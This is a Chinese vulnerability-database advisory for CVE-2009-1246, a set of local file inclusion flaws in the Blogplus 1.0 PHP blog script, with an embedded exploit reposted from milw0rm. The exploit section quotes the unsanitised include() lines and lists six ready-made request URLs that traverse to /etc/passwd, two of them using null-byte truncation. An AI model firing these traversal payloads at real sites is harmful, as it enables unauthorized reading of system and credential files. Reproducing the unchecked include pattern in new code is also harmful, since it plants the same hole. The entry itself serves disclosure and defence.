Blogplus 'includes/block_center_down.php'多个目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117513 漏洞类型 路径遍历
发布时间 2009-03-26 更新时间 2009-04-06
CVE编号 CVE-2009-1246 CNNVD-ID CNNVD-200904-112
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8290
https://cxsecurity.com/issue/WLB-2009040147
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-112
|漏洞详情
Blogplus1.0版本存在多个目录遍历漏洞。远程攻击者可以借助到includes/block_center_down.php的(1)row_mysql_blocks_center_down[file]参数、到block_center_top.php的(2)row_mysql_blocks_center_top[file]includes/参数、到includes/block_left.php的(3)row_mysql_blocks_left[file]参数、到includes/block_right.php的(4)row_mysql_blocks_right[file]参数以及到(5)includes/window_down.php和(6)includes/window_top.php的row_mysql_bloginfo[theme]参数(参数值设置为'..'),包含和运行任意的本地文件。
|漏洞EXP
--:local file include:--
                       ---------------------------------  
script:blog+ v1.0
   
----------------------------------------------
download from:http://www.ziddu.com/download/3151643/blogplus_v1.0_final.zip.html
   
----------------------------------------------

...............................................
vul:/includes/

block_center_down.php = $block_center_down_file = $row_mysql_blocks_center_down['file']; line 6
  include ("blocks/".$block_center_down_file.""); line 7 

block_center_top..php = $block_center_top_file = $row_mysql_blocks_center_top['file']; 6
  include ("blocks/".$block_center_top_file.""); 7

-------------------------------------------
vul:/includes/

block_left.php = $block_left_file = $row_mysql_blocks_left['file']; line 8
  include ("blocks/".$block_left_file.""); 9


block_right.php = $block_right_file = $row_mysql_blocks_right['file']; 6
  include ("blocks/".$block_right_file.""); 7


line1; window_down.php = <?php include ("themes/".$row_mysql_bloginfo['theme']."/down.html"); ?>

line1; window_top.php = <?php include ("themes/".$row_mysql_bloginfo['theme']."/top.html"); ?>


-------------------------------------------
-------------------------------------------
xpl:

/path/includes/block_center_down.php?row_mysql_blocks_center_down[file]=../../../../../../etc/passwd
/path/includes/block_center_top.php?row_mysql_blocks_center_top[file]=../../../../../../etc/passwd
/path/includes/block_left.php?row_mysql_blocks_left[file]=../../../../../../etc/passwd
/path/includes/block_right.php?row_mysql_blocks_right[file]=../../../../../../etc/passwd
/path/includes/window_down.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
/path/includes/window_top.php?row_mysql_bloginfo[theme]=../../../../../../etc/passwd%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady  [kivi_hacker666@yahoo.com]

---------------------------------------------------

# milw0rm.com [2009-03-26]
|参考资料

来源:XF
名称:blogplus-file-theme-file-include(49446)
链接:http://xforce.iss.net/xforce/xfdb/49446
来源:BID
名称:34261
链接:http://www.securityfocus.com/bid/34261
来源:MILW0RM
名称:8290
链接:http://www.milw0rm.com/exploits/8290